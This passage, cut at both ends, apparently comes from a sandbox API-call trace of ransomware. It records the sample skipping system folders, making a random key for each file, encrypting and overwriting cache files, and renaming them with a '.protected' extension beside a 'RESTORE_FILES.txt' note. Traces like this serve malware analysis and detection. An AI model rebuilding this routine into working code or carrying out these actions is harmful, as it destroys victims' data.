(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\1bb09beec155258835c193a7aa85aa5b_a7b2b53af2a12e2cb0a41b96d21d7973"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.936] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973") returned 152 [0088.936] StrStrW (lpFirst="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpSrch=".txt") returned 0x0 [0088.936] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973") returned 152 [0088.936] StrStrW (lpFirst="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpSrch=".rar") returned 0x0 [0088.936] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973") returned 152 [0088.936] StrStrW (lpFirst="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpSrch=".zip") returned 0x0 [0088.936] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x194, lpOverlapped=0x0) returned 1 [0088.937] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe6c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.937] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x194, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x194, lpOverlapped=0x0) returned 1 [0088.937] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.937] WriteFile (in: hFile=0x150, 
lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.938] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.938] CloseHandle (hObject=0x150) returned 1 [0088.938] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973.protected") returned 162 [0088.938] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\1bb09beec155258835c193a7aa85aa5b_a7b2b53af2a12e2cb0a41b96d21d7973"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\1bb09beec155258835c193a7aa85aa5b_a7b2b53af2a12e2cb0a41b96d21d7973.protected")) returned 1 [0088.939] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.939] lstrcmpiW (lpString1="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpString2="Windows") returned -1 [0088.939] lstrcmpiW (lpString1="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpString2="Program Files") returned -1 [0088.939] lstrcmpiW (lpString1="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpString2="Program Files (x86)") returned -1 [0088.939] lstrcmpiW 
(lpString1="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpString2="$Recycle.bin") returned 1 [0088.939] lstrcmpiW (lpString1="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpString2="System Volume Information") returned -1 [0088.939] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406") returned 119 [0088.939] StrStrIW (lpFirst="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpSrch=".protected") returned 0x0 [0088.939] lstrcmpW (lpString1="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpString2="RESTORE_FILES.txt") returned -1 [0088.939] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.939] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.939] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\1daf2884ec4dfa96ba4a58d4dbc9c406"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.939] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406") returned 119 [0088.939] StrStrW (lpFirst="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpSrch=".txt") returned 0x0 [0088.940] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406") returned 119 [0088.940] StrStrW (lpFirst="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpSrch=".rar") returned 0x0 [0088.940] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406") returned 119 [0088.940] StrStrW (lpFirst="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpSrch=".zip") returned 0x0 [0088.940] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x10c, lpOverlapped=0x0) returned 1 [0088.940] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffef4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.941] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x10c, lpOverlapped=0x0) returned 1 [0088.941] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.941] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.941] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.941] CloseHandle (hObject=0x150) returned 1 [0088.941] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406.protected") returned 129 [0088.941] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406" (normalized: 
"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\1daf2884ec4dfa96ba4a58d4dbc9c406"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\1daf2884ec4dfa96ba4a58d4dbc9c406.protected")) returned 1 [0088.942] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.942] lstrcmpiW (lpString1="23B523C9E7746F715D33C6527C18EB9D", lpString2="Windows") returned -1 [0088.942] lstrcmpiW (lpString1="23B523C9E7746F715D33C6527C18EB9D", lpString2="Program Files") returned -1 [0088.942] lstrcmpiW (lpString1="23B523C9E7746F715D33C6527C18EB9D", lpString2="Program Files (x86)") returned -1 [0088.942] lstrcmpiW (lpString1="23B523C9E7746F715D33C6527C18EB9D", lpString2="$Recycle.bin") returned 1 [0088.942] lstrcmpiW (lpString1="23B523C9E7746F715D33C6527C18EB9D", lpString2="System Volume Information") returned -1 [0088.942] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D") returned 119 [0088.942] StrStrIW (lpFirst="23B523C9E7746F715D33C6527C18EB9D", lpSrch=".protected") returned 0x0 [0088.942] lstrcmpW (lpString1="23B523C9E7746F715D33C6527C18EB9D", lpString2="RESTORE_FILES.txt") returned -1 [0088.942] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.942] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.942] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\23b523c9e7746f715d33c6527c18eb9d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.943] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D") returned 119 [0088.943] StrStrW (lpFirst="23B523C9E7746F715D33C6527C18EB9D", lpSrch=".txt") returned 0x0 [0088.943] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D") returned 119 [0088.943] StrStrW (lpFirst="23B523C9E7746F715D33C6527C18EB9D", lpSrch=".rar") returned 0x0 [0088.943] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D") returned 119 [0088.943] StrStrW (lpFirst="23B523C9E7746F715D33C6527C18EB9D", lpSrch=".zip") returned 0x0 [0088.943] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x124, lpOverlapped=0x0) returned 1 [0088.944] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffedc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.944] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x124, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x124, lpOverlapped=0x0) returned 1 [0088.944] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.944] 
WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.944] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.944] CloseHandle (hObject=0x150) returned 1 [0088.944] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D.protected") returned 129 [0088.944] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\23b523c9e7746f715d33c6527c18eb9d"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\23b523c9e7746f715d33c6527c18eb9d.protected")) returned 1 [0088.945] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.945] lstrcmpiW (lpString1="3130B1871A126520A8C47861EFE3ED4D", lpString2="Windows") returned -1 [0088.945] lstrcmpiW (lpString1="3130B1871A126520A8C47861EFE3ED4D", lpString2="Program Files") returned -1 [0088.945] lstrcmpiW (lpString1="3130B1871A126520A8C47861EFE3ED4D", lpString2="Program Files (x86)") returned -1 [0088.945] lstrcmpiW (lpString1="3130B1871A126520A8C47861EFE3ED4D", lpString2="$Recycle.bin") returned 1 [0088.945] lstrcmpiW (lpString1="3130B1871A126520A8C47861EFE3ED4D", 
lpString2="System Volume Information") returned -1 [0088.945] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D") returned 119 [0088.945] StrStrIW (lpFirst="3130B1871A126520A8C47861EFE3ED4D", lpSrch=".protected") returned 0x0 [0088.945] lstrcmpW (lpString1="3130B1871A126520A8C47861EFE3ED4D", lpString2="RESTORE_FILES.txt") returned -1 [0088.945] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.945] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.945] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\3130b1871a126520a8c47861efe3ed4d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.946] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D") returned 119 [0088.946] StrStrW (lpFirst="3130B1871A126520A8C47861EFE3ED4D", lpSrch=".txt") returned 0x0 [0088.946] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D") returned 119 [0088.946] StrStrW (lpFirst="3130B1871A126520A8C47861EFE3ED4D", lpSrch=".rar") returned 0x0 [0088.946] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D") returned 119 
[0088.946] StrStrW (lpFirst="3130B1871A126520A8C47861EFE3ED4D", lpSrch=".zip") returned 0x0 [0088.946] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0xdc, lpOverlapped=0x0) returned 1 [0088.947] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff24, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.947] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0xdc, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0xdc, lpOverlapped=0x0) returned 1 [0088.947] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.947] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.947] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.947] CloseHandle (hObject=0x150) returned 1 [0088.947] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D.protected") returned 129 [0088.947] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\3130b1871a126520a8c47861efe3ed4d"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\3130b1871a126520a8c47861efe3ed4d.protected")) returned 1 [0088.948] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.948] lstrcmpiW (lpString1="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpString2="Windows") returned -1 [0088.948] lstrcmpiW (lpString1="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpString2="Program Files") returned -1 [0088.948] lstrcmpiW (lpString1="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpString2="Program Files (x86)") returned -1 [0088.948] lstrcmpiW (lpString1="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpString2="$Recycle.bin") returned 1 [0088.948] lstrcmpiW (lpString1="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpString2="System Volume Information") returned -1 [0088.948] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D") returned 152 [0088.948] StrStrIW (lpFirst="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpSrch=".protected") returned 0x0 [0088.948] lstrcmpW (lpString1="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpString2="RESTORE_FILES.txt") returned -1 [0088.948] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.948] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.948] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\3388ecc3f7bc4a9271c10ed8621e5a65_f55c512047947b70f94de5dec6d6838d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.948] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D") returned 152 [0088.949] StrStrW (lpFirst="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpSrch=".txt") returned 0x0 [0088.949] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D") returned 152 [0088.949] StrStrW (lpFirst="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpSrch=".rar") returned 0x0 [0088.949] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D") returned 152 [0088.949] StrStrW (lpFirst="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpSrch=".zip") returned 0x0 [0088.949] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x18a, lpOverlapped=0x0) returned 1 [0088.949] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe76, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.950] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x18a, 
lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x18a, lpOverlapped=0x0) returned 1 [0088.950] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.950] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.950] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.950] CloseHandle (hObject=0x150) returned 1 [0088.950] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D.protected") returned 162 [0088.950] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D" (normalized: "c:\\users\\5p5nrgjn0js 